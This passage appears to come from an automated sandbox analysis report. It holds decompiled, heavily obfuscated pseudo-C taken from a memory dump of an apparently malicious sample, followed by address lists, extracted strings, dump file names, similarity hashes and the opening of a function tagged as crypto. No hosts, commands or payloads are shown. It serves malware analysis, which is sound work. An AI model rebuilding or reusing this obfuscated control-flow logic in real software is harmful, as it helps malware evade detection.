				_v544 = _v544 * 0x47;
				_v544 = _v544 + 0xb9e3;
				_v544 = _v544 ^ 0x01253a55;
				_v212 = 0x425875;
				_v212 = _v212 + 0x7431;
				_v212 = _v212 ^ 0x0041fedc;
				_v260 = 0x54a854;
				_v260 = _v260 | 0x1d514e27;
				_v260 = _v260 ^ 0x1d5761a0;
				_v584 = 0x39c2de;
				_v584 = _v584 | 0x4c80d3bc;
				_v584 = _v584 << 0xc;
				_v584 = _v584 | 0x441dde0c;
				_v584 = _v584 ^ 0xdd38fc4c;
				_v344 = 0x95cd3f;
				_v344 = _v344 ^ 0x4219606c;
				_v344 = _v344 ^ 0x42865e33;
				_v508 = 0xa24718;
				_v508 = _v508 ^ 0x0ba3a041;
				_v508 = _v508 + 0xffff081d;
				_t1301 = 0x6a;
				_v508 = _v508 * 0x1a;
				_v508 = _v508 ^ 0x1e12fccc;
				_v420 = 0x3d1d24;
				_v420 = _v420 / _t1301;
				_v420 = _v420 ^ 0x000d008e;
				_v360 = 0xb9f9fd;
				_v360 = _v360 << 0x10;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x00f4144b;
				_v500 = 0x98528f;
				_v500 = _v500 + 0xffff38ee;
				_t1302 = 0x63;
				_v500 = _v500 * 0x15;
				_v500 = _v500 / _t1302;
				_v500 = _v500 ^ 0x0021bcf3;
				_v552 = 0x759a04;
				_v552 = _v552 ^ 0x24707ad6;
				_t1303 = 0x6e;
				_v552 = _v552 * 0x7a;
				_v552 = _v552 + 0xffffc280;
				_v552 = _v552 ^ 0x2bf8833e;
				_v432 = 0xe0fde6;
				_v432 = _v432 * 0x65;
				_v432 = _v432 << 5;
				_v432 = _v432 ^ 0x188550d0;
				_v412 = 0x5ec2e0;
				_v412 = _v412 * 0x55;
				_v412 = _v412 ^ 0x69c41202;
				_v412 = _v412 ^ 0x76b2a663;
				_v272 = 0x9cff2f;
				_v272 = _v272 ^ 0x9ba2f041;
				_v272 = _v272 ^ 0x9b3e00ce;
				_v264 = 0xc7d38e;
				_v264 = _v264 / _t1303;
				_v264 = _v264 ^ 0x0001ce4c;
				_v484 = 0x795f49;
				_v484 = _v484 << 5;
				_v484 = _v484 >> 0xa;
				_v484 = _v484 ^ 0x000e715a;
				_v652 = 0x133e50;
				_v652 = _v652 << 0xb;
				_v652 = _v652 | 0x562c81c4;
				_v652 = _v652 + 0xd02a;
				_v652 = _v652 ^ 0xdff2ea4e;
				_v536 = 0x9207c;
				_v536 = _v536 ^ 0xf6913151;
				_v536 = _v536 << 0xe;
				_v536 = _v536 * 0x45;
				_v536 = _v536 ^ 0x2846b420;
				_v328 = 0x351a5;
				_v328 = _v328 + 0xffffae72;
				_v328 = _v328 ^ 0x000df437;
				_v636 = 0x9ce8ca;
				_v636 = _v636 >> 2;
				_v636 = _v636 + 0xa040;
				_v636 = _v636 | 0x4a71b9c2;
				_v636 = _v636 ^ 0x4a778ec2;
				_v628 = 0xac61e6;
				_t1304 = 0x53;
				_v628 = _v628 / _t1304;
				_v628 = _v628 + 0xd452;
				_t1305 = 0x60;
				_v628 = _v628 / _t1305;
				_v628 = _v628 ^ 0x0000eda0;
				goto L1;
				do {
					while(1) {
						L1:
						_t1460 = _t1427 - 0x7b63c34;
						if(_t1460 > 0) {
							break;
						}
						if(_t1460 == 0) {
							_t1203 = E048E2524();
							__eflags = _t1203;
							if(__eflags == 0) {
								L113:
								return _t1203;
							}
							_t1427 = 0x3dea847;
							continue;
						}
						_t1461 = _t1427 - 0x5c593cc;
						if(_t1461 > 0) {
							__eflags = _t1427 - 0x67c006a;
							if(__eflags > 0) {
								__eflags = _t1427 - 0x6a3e761;
								if(_t1427 == 0x6a3e761) {
									_t1203 = E048C2A46();
									__eflags = _t1203;
									if(__eflags == 0) {
										goto L113;
									}
									_t1427 = 0x67c006a;
									continue;
								}
								__eflags = _t1427 - 0x6fcc186;
								if(_t1427 == 0x6fcc186) {
									_t1203 = E048C3845();
									asm("sbb esi, esi");
									_t1427 = ( ~_t1203 & 0xf8d129f4) + 0x9e4a4e0;
									continue;
								}
								__eflags = _t1427 - 0x724357f;
								if(_t1427 == 0x724357f) {
									_t1203 = E048E292B();
									goto L113;
								}
								__eflags = _t1427 - 0x736300d;
								if(_t1427 != 0x736300d) {
									goto L110;
								}
								_t1203 = E048D3741(_t1322);
								goto L113;
							}
							if(__eflags == 0) {
								E048D056A();
								_t1203 = E048D747E();
								asm("sbb esi, esi");
								_t1427 = ( ~_t1203 & 0x029c2de1) + 0x8ed89b7;
								continue;
							}
							__eflags = _t1427 - 0x5d70829;
							if(_t1427 == 0x5d70829) {
								_t1203 = E048D4E8A();
								_t1427 = 0xbe677c5;
								continue;
							}
							__eflags = _t1427 - 0x5f75feb;
							if(_t1427 == 0x5f75feb) {
								_t1203 = E048D78A5();
								_v140 = _t1203;
								_t1427 = 0xff36ff2;
								continue;
							}
							__eflags = _t1427 - 0x673fd33;
							if(_t1427 == 0x673fd33) {
								_t1203 = E048D747E();
								__eflags = _t1203;
								if(__eflags == 0) {
									_t1203 = E048DBFE8();
								}
								L13:
								_t1427 = 0x9c4010;
								continue;
							}
							__eflags = _t1427 - 0x67b0e1a;
							if(_t1427 != 0x67b0e1a) {
								goto L110;
							}
							_push(_v532);
							_t1203 = E048CF41F(_v516, _v524, _v224, _t1322);
							goto L113;
						}
						if(_t1461 == 0) {
							_t1203 = _v552;
							_t1427 = 0xa8d5876;
							_v156 = _t1203;
							continue;
						}
						_t1462 = _t1427 - 0x1bcf8e1;
						if(_t1462 > 0) {
							__eflags = _t1427 - 0x2b5ced4;
							if(_t1427 == 0x2b5ced4) {
								_t1203 = E048DD99A();
								_t1427 = 0x6a3e761;
								continue;
							}
							__eflags = _t1427 - 0x3104a35;
							if(_t1427 == 0x3104a35) {
								_t1203 = E048D748A();
								_t1427 = 0x1bcf8e1;
								continue;
							}
							__eflags = _t1427 - 0x3dea847;
							if(_t1427 == 0x3dea847) {
								_t1203 = E048DDEF4();
								__eflags = _t1203;
								if(__eflags == 0) {
									goto L113;
								}
								_t1427 = 0x6fcc186;
								continue;
							}
							__eflags = _t1427 - 0x4dcc622;
							if(_t1427 != 0x4dcc622) {
								goto L110;
							}
							_t1203 = E048C2043(_v172, _v616, _v444, _v560);
							L29:
							_pop(_t1322);
							_t1427 = 0x84d4dd9;
							continue;
						}
						if(_t1462 == 0) {
							_v180 = E048CD10C(_v244,  &_v176, __eflags, _v568, 0x48c1254, _v380, _v324);
							_v188 = E048CD10C(_v404,  &_v184, __eflags, _v632, 0x48c12b4, _v316, _v460);
							_t1228 = E048DA8F0( &_v180,  &_v188, _v452, _v204);
							asm("sbb esi, esi");
							_t1427 = ( ~_t1228 & 0x05b78faa) + 0x6f20070;
							E048E0352(_v236, _v308, _v188, _v504);
							_t1203 = E048E0352(_v300, _v624, _v180, _v364);
							_t1457 = _t1457 + 0x38;
							goto L110;
						}
						if(_t1427 == 0x9c4010) {
							_t1203 = E048C2043(_v164, _v468, _v348, _v640);
							_t1427 = 0x4dcc622;
							continue;
						}
						if(_t1427 == 0xda7b66) {
							_t1203 = E048D2FA2(E048E18C9(), _v332,  &_v172, _v252, _v412, _v340,  &_v164, _v216);
							_t1457 = _t1457 + 0x18;
							asm("sbb esi, esi");
							_t1427 = ( ~_t1203 & 0x0055db1a) + 0xda7b66;
							continue;
						}
						if(_t1427 == 0x10b8ae6) {
							_t1203 = E048C9384();
							__eflags = _t1203;
							if(__eflags == 0) {
								goto L113;
							}
							_t1427 = 0x7b63c34;
							continue;
						}
						if(_t1427 != 0x1305680) {
							goto L110;
						}
						_t1322 = _v472;
						_t1236 = E048D406E(_v472, _v648,  &_v68, _v576,  &_v164);
						_t1457 = _t1457 + 0xc;
						if(_t1236 != 0) {
							_t1203 = _v40;
							__eflags = _t1203 - 8;
							if(__eflags != 0) {
								__eflags = _t1203;
								if(__eflags == 0) {
									L18:
									_t1427 = 0x98f2637;
									continue;
								}
								__eflags = _t1203 - 1;
								if(__eflags != 0) {
									goto L13;
								}
								goto L18;
							}
							_t1427 = 0x724357f;
							continue;
						} else {
							_t1203 = E048C55AF(_v536, _v484);
							_pop(_t1322);
							goto L13;
						}
					}
					__eflags = _t1427 - 0xbc1c91a;
					if(__eflags > 0) {
						__eflags = _t1427 - 0xe7bf1ec;
						if(__eflags > 0) {
							__eflags = _t1427 - 0xf9e9c9c;
							if(_t1427 == 0xf9e9c9c) {
								E048D2F56( &_v100, _v232, _v240, _v368);
								_t1427 = 0xe796d92;
								goto L110;
							}
							__eflags = _t1427 - 0xfe9ceb8;
							if(_t1427 == 0xfe9ceb8) {
								_v152 = E048C879F();
								_t1203 = E048DF086(_v376, _t1202, _v248);
								_v148 = _t1203;
								_t1427 = 0xbc1c91a;
								goto L1;
							}
							__eflags = _t1427 - 0xff36ff2;
							if(_t1427 != 0xff36ff2) {
								goto L110;
							}
							_t1203 = E048C4AF2();
							_v76 = _t1203;
							_t1427 = 0x5c593cc;
							goto L1;
						}
						if(__eflags == 0) {
							_t1203 = E048C2E17();
							_t1427 = 0x3104a35;
							goto L1;
						}
						__eflags = _t1427 - 0xbdc33a8;
						if(_t1427 == 0xbdc33a8) {
							_t1203 = E048C6FC4();
							asm("sbb esi, esi");
							_t1431 =  ~_t1203 & 0xf7ff1c2e;
							L90:
							_t1427 = _t1431 + 0xe7bf1ec;
							goto L1;
						}
						__eflags = _t1427 - 0xbe677c5;
						if(_t1427 == 0xbe677c5) {
							_t1203 = E048C1A0A();
							_t1427 = 0x2b5ced4;
							goto L1;
						}
						__eflags = _t1427 - 0xca9901a;
						if(_t1427 == 0xca9901a) {
							E048E2524();
							_t1278 = 0xfe9ceb8;
							_t1203 = E048C55AF(_v264, _v272);
							goto L29;
						}
						__eflags = _t1427 - 0xe796d92;
						if(_t1427 != 0xe796d92) {
							goto L110;
						}
						_t1203 = E048CE21C( &_v172,  &_v156, _v288, _v400);
						asm("sbb esi, esi");
						_pop(_t1322);
						_t1427 = ( ~_t1203 & 0xfbfdb544) + 0x4dcc622;
						goto L1;
					}
					if(__eflags == 0) {
						_t1203 = E048D98B1();
						_v124 = _t1203;
						_t1427 = 0x5f75feb;
						goto L1;
					}
					__eflags = _t1427 - 0x98f2637;
					if(__eflags > 0) {
						__eflags = _t1427 - 0x9e4a4e0;
						if(_t1427 == 0x9e4a4e0) {
							__eflags = E048DECE3();
							if(__eflags == 0) {
								_t1203 = E048D747E();
								asm("sbb esi, esi");
								_t1427 = ( ~_t1203 & 0xf9f09064) + 0xbe677c5;
								goto L1;
							}
							_t1203 = E048D747E();
							asm("sbb esi, esi");
							_t1431 =  ~_t1203 & 0xfd6041bc;
							__eflags = _t1431;
							goto L90;
						}
						__eflags = _t1427 - 0xa8d5876;
						if(__eflags == 0) {
							_t1203 = _v432;
							_t1427 = 0xf9e9c9c;
							_v136 = _t1203;
							goto L1;
						}
						__eflags = _t1427 - 0xb3ae7c2;
						if(__eflags == 0) {
							_t1203 = E048D399B(__eflags);
							__eflags = _t1203;
							if(__eflags == 0) {
								goto L113;
							}
							_t1427 = 0x92a1e62;
							goto L1;
						}
						__eflags = _t1427 - 0xb89b798;
						if(_t1427 != 0xb89b798) {
							goto L110;
						}
						_t1203 = E048CA3DF();
						_t1427 = 0x8ed89b7;
						goto L1;
					}
					if(__eflags == 0) {
						_t1203 = E048C6B25(_v520,  &_v24, _v456);
						_pop(_t1322);
						__eflags = _t1203;
						if(__eflags == 0) {
							_t1203 = _v40;
							__eflags = _t1203;
							if(_t1203 == 0) {
								_t1425 = E048C55AF(_v328, _v652);
								_t1203 = _v40;
								_pop(_t1322);
							}
							__eflags = _t1203 - 1;
							if(__eflags == 0) {
								_t1203 = E048C55AF(_v628, _v636);
								_pop(_t1322);
							}
						} else {
							_t1425 = _v656;
						}
						_t1278 = 0xf9e9c9c;
						_t1427 = 0x673fd33;
						goto L1;
					}
					__eflags = _t1427 - 0x84d4dd9;
					if(_t1427 == 0x84d4dd9) {
						__eflags = _t1425 - _v480;
						if(_t1425 == _v480) {
							L72:
							_t1427 = _t1278;
							goto L110;
						}
						_t1257 = E048E18C9();
						_t1322 = _t1425;
						_t1203 = E048E18D2(_t1425, _v544, _t1257, _v212, _v260);
						_t1457 = _t1457 + 0xc;
						__eflags = _t1203 - _v464;
						if(__eflags == 0) {
							_t1203 = E048C55E8();
							goto L72;
						}
						_t1427 = 0x736300d;
						goto L1;
					}
					__eflags = _t1427 - 0x8ed89b7;
					if(_t1427 == 0x8ed89b7) {
						_t1203 = E048C43A2();
						_t1427 = 0x67b0e1a;
						goto L1;
					}
					__eflags = _t1427 - 0x9128461;
					if(__eflags == 0) {
						_t1427 = 0xb3ae7c2;
						goto L1;
					}
					__eflags = _t1427 - 0x92a1e62;
					if(_t1427 != 0x92a1e62) {
						goto L110;
					}
					_t1203 = E048DA370();
					_t1427 = 0x10b8ae6;
					goto L1;
					L110:
					__eflags = _t1427 - 0x6f20070;
				} while (__eflags != 0);
				goto L113;
			}

0x048d5784
0x048d578a
0x048d5797
0x048d57af
0x048d57b4
0x048d57bd
0x048d57c8
0x048d57cd
0x048d57d5
0x048d57e2
0x048d57e5
0x048d57e8
0x048d57ec
0x048d57f4
0x048d57fc
0x048d5807
0x048d5812
0x048d581d
0x048d5828
0x048d583e
0x048d5845
0x048d5850
0x048d585d
0x048d5860
0x048d5864
0x048d5869
0x048d5871
0x048d5879
0x048d5884
0x048d5897
0x048d589e
0x048d58a9
0x048d58b4
0x048d58bc
0x048d58c7
0x048d58d2
0x048d58da
0x048d58df
0x048d58e7
0x048d58ef
0x048d58f7
0x048d590d
0x048d591b
0x048d591e
0x048d592d
0x048d5934
0x048d593f
0x048d594a
0x048d5955
0x048d5960
0x048d596b
0x048d5976
0x048d5981
0x048d598c
0x048d5997
0x048d59a2
0x048d59af
0x048d59b7
0x048d59c5
0x048d59ca
0x048d59d4
0x048d59d9
0x048d59df
0x048d59e7
0x048d59f2
0x048d59fa
0x048d5a05
0x048d5a10
0x048d5a1b
0x048d5a23
0x048d5a2e
0x048d5a39
0x048d5a41
0x048d5a4c
0x048d5a54
0x048d5a5c
0x048d5a64
0x048d5a6c
0x048d5a74
0x048d5a87
0x048d5a8a
0x048d5a91
0x048d5a9c
0x048d5aa7
0x048d5ab2
0x048d5aba
0x048d5ac5
0x048d5ad0
0x048d5adb
0x048d5ae6
0x048d5aed
0x048d5af8
0x048d5b0a
0x048d5b0f
0x048d5b18
0x048d5b23
0x048d5b35
0x048d5b3a
0x048d5b43
0x048d5b4e
0x048d5b59
0x048d5b64
0x048d5b6f
0x048d5b7a
0x048d5b8c
0x048d5b8f
0x048d5b96
0x048d5b9e
0x048d5ba9
0x048d5bb4
0x048d5bbf
0x048d5bca
0x048d5bd5
0x048d5beb
0x048d5bf0
0x048d5c01
0x048d5c04
0x048d5c0b
0x048d5c16
0x048d5c21
0x048d5c2c
0x048d5c37
0x048d5c3f
0x048d5c47
0x048d5c4f
0x048d5c57
0x048d5c5f
0x048d5c6a
0x048d5c75
0x048d5c80
0x048d5c88
0x048d5c90
0x048d5c98
0x048d5ca0
0x048d5cab
0x048d5cb3
0x048d5cbe
0x048d5cc9
0x048d5cd4
0x048d5ce3
0x048d5cea
0x048d5cf5
0x048d5d00
0x048d5d08
0x048d5d1b
0x048d5d22
0x048d5d2d
0x048d5d38
0x048d5d4e
0x048d5d55
0x048d5d60
0x048d5d6b
0x048d5d76
0x048d5d81
0x048d5d8c
0x048d5d97
0x048d5d9f
0x048d5daa
0x048d5db5
0x048d5dc0
0x048d5dc8
0x048d5dd0
0x048d5dda
0x048d5ddd
0x048d5de1
0x048d5de9
0x048d5df1
0x048d5dff
0x048d5e03
0x048d5e0b
0x048d5e13
0x048d5e1e
0x048d5e29
0x048d5e36
0x048d5e48
0x048d5e4d
0x048d5e54
0x048d5e5f
0x048d5e67
0x048d5e77
0x048d5e82
0x048d5e85
0x048d5e89
0x048d5e91
0x048d5e9c
0x048d5ea4
0x048d5eab
0x048d5eb6
0x048d5ec1
0x048d5ecc
0x048d5ed7
0x048d5ee2
0x048d5eea
0x048d5ef5
0x048d5f00
0x048d5f08
0x048d5f14
0x048d5f1d
0x048d5f21
0x048d5f29
0x048d5f34
0x048d5f3f
0x048d5f4a
0x048d5f55
0x048d5f5d
0x048d5f68
0x048d5f73
0x048d5f7e
0x048d5f8e
0x048d5f95
0x048d5fa0
0x048d5fab
0x048d5fb6
0x048d5fc1
0x048d5fcc
0x048d5fd4
0x048d5fdf
0x048d5ff2
0x048d5ff9
0x048d6004
0x048d600f
0x048d6022
0x048d6034
0x048d603b
0x048d6046
0x048d6051
0x048d6059
0x048d6064
0x048d606c
0x048d6074
0x048d6078
0x048d607b
0x048d607f
0x048d6087
0x048d608f
0x048d60a6
0x048d60a9
0x048d60aa
0x048d60b1
0x048d60b9
0x048d60c4
0x048d60d1
0x048d60d5
0x048d60df
0x048d60e3
0x048d60eb
0x048d60f3
0x048d60fb
0x048d6100
0x048d6104
0x048d610c
0x048d6117
0x048d6122
0x048d612d
0x048d6138
0x048d6143
0x048d614e
0x048d6159
0x048d6164
0x048d616f
0x048d617a
0x048d6190
0x048d6197
0x048d61a2
0x048d61b8
0x048d61bf
0x048d61ca
0x048d61d5
0x048d61e0
0x048d61e8
0x048d61f3
0x048d61fb
0x048d6205
0x048d6209
0x048d6211
0x048d6219
0x048d6224
0x048d622f
0x048d6237
0x048d6242
0x048d624d
0x048d625e
0x048d6265
0x048d6270
0x048d6278
0x048d6280
0x048d628d
0x048d6291
0x048d6299
0x048d62a4
0x048d62af
0x048d62ba
0x048d62cd
0x048d62d4
0x048d62df
0x048d62ea
0x048d62f5
0x048d62fd
0x048d6308
0x048d631e
0x048d6323
0x048d632c
0x048d6337
0x048d6342
0x048d634d
0x048d6355
0x048d6360
0x048d636b
0x048d6376
0x048d637e
0x048d6389
0x048d6394
0x048d639f
0x048d63aa
0x048d63bc
0x048d63c1
0x048d63ca
0x048d63d5
0x048d63e0
0x048d63e8
0x048d63f3
0x048d6405
0x048d640a
0x048d6413
0x048d641e
0x048d6429
0x048d6434
0x048d643f
0x048d644a
0x048d6457
0x048d645a
0x048d645e
0x048d6463
0x048d646b
0x048d6473
0x048d647b
0x048d6483
0x048d6488
0x048d648d
0x048d6495
0x048d64a8
0x048d64af
0x048d64b7
0x048d64c2
0x048d64cd
0x048d64d5
0x048d64e0
0x048d64eb
0x048d64fe
0x048d6505
0x048d6510
0x048d651b
0x048d6526
0x048d6535
0x048d6538
0x048d653f
0x048d654a
0x048d6555
0x048d655f
0x048d6567
0x048d6572
0x048d657d
0x048d6588
0x048d6593
0x048d659e
0x048d65a9
0x048d65b4
0x048d65bc
0x048d65c4
0x048d65d2
0x048d65d7
0x048d65db
0x048d65e3
0x048d65ee
0x048d65f6
0x048d65fe
0x048d6609
0x048d6614
0x048d661f
0x048d662a
0x048d6635
0x048d663d
0x048d6648
0x048d665b
0x048d6662
0x048d666d
0x048d6678
0x048d6683
0x048d668e
0x048d6699
0x048d66a1
0x048d66a6
0x048d66ae
0x048d66b3
0x048d66bb
0x048d66c3
0x048d66c8
0x048d66d0
0x048d66d5
0x048d66dd
0x048d66e8
0x048d66f0
0x048d66fb
0x048d6706
0x048d670e
0x048d6716
0x048d671b
0x048d6720
0x048d6728
0x048d6733
0x048d673e
0x048d6749
0x048d6754
0x048d6768
0x048d6777
0x048d677e
0x048d6789
0x048d6794
0x048d679f
0x048d67aa
0x048d67b5
0x048d67c0
0x048d67cb
0x048d67d6
0x048d67de
0x048d67e6
0x048d67eb
0x048d67f3
0x048d67fb
0x048d6806
0x048d6813
0x048d681e
0x048d6829
0x048d6834
0x048d6849
0x048d684c
0x048d6853
0x048d685e
0x048d6874
0x048d687b
0x048d6886
0x048d6891
0x048d6899
0x048d68a1
0x048d68ac
0x048d68b7
0x048d68ca
0x048d68cd
0x048d68df
0x048d68e6
0x048d68f1
0x048d68fc
0x048d690f
0x048d6910
0x048d6914
0x048d691c
0x048d6924
0x048d6937
0x048d693e
0x048d6946
0x048d6951
0x048d6964
0x048d696b
0x048d6976
0x048d6981
0x048d698c
0x048d6997
0x048d69a2
0x048d69b6
0x048d69bd
0x048d69c8
0x048d69d3
0x048d69db
0x048d69e3
0x048d69ee
0x048d69f6
0x048d69fb
0x048d6a03
0x048d6a0b
0x048d6a13
0x048d6a1e
0x048d6a29
0x048d6a39
0x048d6a40
0x048d6a4b
0x048d6a56
0x048d6a61
0x048d6a6c
0x048d6a74
0x048d6a79
0x048d6a81
0x048d6a89
0x048d6a91
0x048d6aa6
0x048d6aab
0x048d6ab1
0x048d6abd
0x048d6ace
0x048d6ad2
0x048d6ad2
0x048d6ada
0x048d6ada
0x048d6ada
0x048d6ada
0x048d6ae0
0x00000000
0x00000000
0x048d6ae6
0x048d6f8b
0x048d6f90
0x048d6f92
0x048d73bb
0x048d73c2
0x048d73c2
0x048d6f98
0x00000000
0x048d6f98
0x048d6aec
0x048d6af2
0x048d6e02
0x048d6e08
0x048d6ef8
0x048d6efe
0x048d6f70
0x048d6f75
0x048d6f77
0x00000000
0x00000000
0x048d6f7d
0x00000000
0x048d6f7d
0x048d6f00
0x048d6f06
0x048d6f46
0x048d6f4f
0x048d6f57
0x00000000
0x048d6f57
0x048d6f08
0x048d6f0e
0x048d73b6
0x00000000
0x048d73b6
0x048d6f14
0x048d6f1a
0x00000000
0x00000000
0x048d6f2e
0x00000000
0x048d6f2e
0x048d6e0e
0x048d6ecc
0x048d6edc
0x048d6ee5
0x048d6eed
0x00000000
0x048d6eed
0x048d6e14
0x048d6e1a
0x048d6eb6
0x048d6ebb
0x00000000
0x048d6ebb
0x048d6e20
0x048d6e26
0x048d6e99
0x048d6e9e
0x048d6ea5
0x00000000
0x048d6ea5
0x048d6e28
0x048d6e2e
0x048d6e74
0x048d6e79
0x048d6e7b
0x048d6e88
0x048d6e88
0x048d6b92
0x048d6b92
0x00000000
0x048d6b92
0x048d6e30
0x048d6e36
0x00000000
0x00000000
0x048d6e3c
0x048d6e59
0x00000000
0x048d6e5e
0x048d6af8
0x048d6ded
0x048d6df1
0x048d6df6
0x00000000
0x048d6df6
0x048d6afe
0x048d6b04
0x048d6d49
0x048d6d4f
0x048d6dde
0x048d6de3
0x00000000
0x048d6de3
0x048d6d55
0x048d6d5b
0x048d6dc8
0x048d6dcd
0x00000000
0x048d6dcd
0x048d6d5d
0x048d6d63
0x048d6da6
0x048d6dab
0x048d6dad
0x00000000
0x00000000
0x048d6db3
0x00000000
0x048d6db3
0x048d6d65
0x048d6d6b
0x00000000
0x00000000
0x048d6d87
0x048d6d8c
0x048d6d8d
0x048d6d8e
0x00000000
0x048d6d8e
0x048d6b0a
0x048d6ca5
0x048d6cd6
0x048d6ceb
0x048d6d10
0x048d6d18
0x048d6d1e
0x048d6d3c
0x048d6d41
0x00000000
0x048d6d41
0x048d6b16
0x048d6c5c
0x048d6c63
0x00000000
0x048d6c63
0x048d6b22
0x048d6c24
0x048d6c29
0x048d6c30
0x048d6c38
0x00000000
0x048d6c38
0x048d6b2e
0x048d6bcc
0x048d6bd1
0x048d6bd3
0x00000000
0x00000000
0x048d6bd9
0x00000000
0x048d6bd9
0x048d6b3a
0x00000000
0x00000000
0x048d6b57
0x048d6b5f
0x048d6b64
0x048d6b69
0x048d6b9c
0x048d6ba3
0x048d6ba6
0x048d6bb2
0x048d6bb4
0x048d6bbb
0x048d6bbb
0x00000000
0x048d6bbb
0x048d6bb6
0x048d6bb9
0x00000000
0x00000000
0x00000000
0x048d6bb9
0x048d6ba8
0x00000000
0x048d6b6b
0x048d6b87
0x048d6b8d
0x00000000
0x048d6b90
0x048d6b69
0x048d6fa2
0x048d6fa8
0x048d7207
0x048d720d
0x048d72ff
0x048d7301
0x048d738e
0x048d7395
0x00000000
0x048d7395
0x048d7303
0x048d7309
0x048d7354
0x048d735b
0x048d7361
0x048d7368
0x00000000
0x048d7368
0x048d730b
0x048d7311
0x00000000
0x00000000
0x048d731b
0x048d7320
0x048d7327
0x00000000
0x048d7327
0x048d7213
0x048d72f0
0x048d72f5
0x00000000
0x048d72f5
0x048d7219
0x048d721f
0x048d72d6
0x048d72df
0x048d72e1
0x048d71b4
0x048d71b4
0x00000000
0x048d71b4
0x048d7225
0x048d722b
0x048d72c0
0x048d72c5
0x00000000
0x048d72c5
0x048d7231
0x048d7237
0x048d7283
0x048d728f
0x048d72a6
0x00000000
0x048d72ab
0x048d7239
0x048d723f
0x00000000
0x00000000
0x048d7261
0x048d726b
0x048d7273
0x048d7274
0x00000000
0x048d7274
0x048d6fae
0x048d71f1
0x048d71f6
0x048d71fd
0x00000000
0x048d71fd
0x048d6fb4
0x048d6fba
0x048d710c
0x048d7112
0x048d7191
0x048d7193
0x048d71ca
0x048d71d3
0x048d71db
0x00000000
0x048d71db
0x048d71a3
0x048d71ac
0x048d71ae
0x048d71ae
0x00000000
0x048d71ae
0x048d7114
0x048d711a
0x048d716c
0x048d7173
0x048d7175
0x00000000
0x048d7175
0x048d711c
0x048d7122
0x048d7155
0x048d715a
0x048d715c
0x00000000
0x00000000
0x048d7162
0x00000000
0x048d7162
0x048d7124
0x048d712a
0x00000000
0x00000000
0x048d713b
0x048d7140
0x00000000
0x048d7140
0x048d6fc0
0x048d709b
0x048d70a0
0x048d70a1
0x048d70a3
0x048d70ab
0x048d70b2
0x048d70b4
0x048d70d5
0x048d70d7
0x048d70de
0x048d70de
0x048d70df
0x048d70e2
0x048d70f7
0x048d70fd
0x048d70fe
0x048d70a5
0x048d70a5
0x048d70a5
0x048d7100
0x048d7102
0x00000000
0x048d7102
0x048d6fc6
0x048d6fcc
0x048d7027
0x048d702e
0x048d707f
0x048d707f
0x00000000
0x048d707f
0x048d7037
0x048d7043
0x048d7054
0x048d7059
0x048d705c
0x048d7063
0x048d707a
0x00000000
0x048d707a
0x048d7065
0x00000000
0x048d7065
0x048d6fce
0x048d6fd4
0x048d7018
0x048d701d
0x00000000
0x048d701d
0x048d6fd6
0x048d6fdc
0x048d7000
0x00000000
0x048d7000
0x048d6fde
0x048d6fe4
0x00000000
0x00000000
0x048d6ff1
0x048d6ff6
0x00000000
0x048d739a
0x048d739a
0x048d739a
0x00000000

Strings

YL9, xrefs: 048D5A10
D3wL, xrefs: 048D643F
1t, xrefs: 048D679F
R/, xrefs: 048D5C47
1mM#, xrefs: 048D5D76
%&, xrefs: 048D59FA
8, xrefs: 048D62D4
X, xrefs: 048D657D
r`, xrefs: 048D5ADB
W), xrefs: 048D5FDF
cT;, xrefs: 048D5ED7
uXB, xrefs: 048D6794
HG\, xrefs: 048D65FE
dGK, xrefs: 048D5D8C
!HR, xrefs: 048D5FC1
#^, xrefs: 048D63E8
g", xrefs: 048D6138
| , xrefs: 048D6A13
I_y, xrefs: 048D69C8
KB7, xrefs: 048D6593
H]9, xrefs: 048D6074

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: !HR$#^$%&$1mM#$1t$D3wL$HG\$I_y$KB7$R/$X$YL9$cT;$dGK$g"$r`$uXB$| $H]9$W)$8
API String ID: 0-1856653443
Opcode ID: 1d335660155c222eaecba666bfad0a61683f378430d374ba9cf05a518c39ffe9
Instruction ID: 9201a67371260e066143b499955daa961138f0d509d1000d92b13a5298d5c0c5
Opcode Fuzzy Hash: 1d335660155c222eaecba666bfad0a61683f378430d374ba9cf05a518c39ffe9
Instruction Fuzzy Hash: 9ED202715093858BD378DF29C589BCBBBE1BB85318F108E1EE5D996260E7B0A944CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048CAC95, Relevance: 23.2, Strings: 18, Instructions: 685
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E048CAC95(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, signed int* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, signed int _a48) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _t800;
				signed int* _t818;
				signed int _t819;
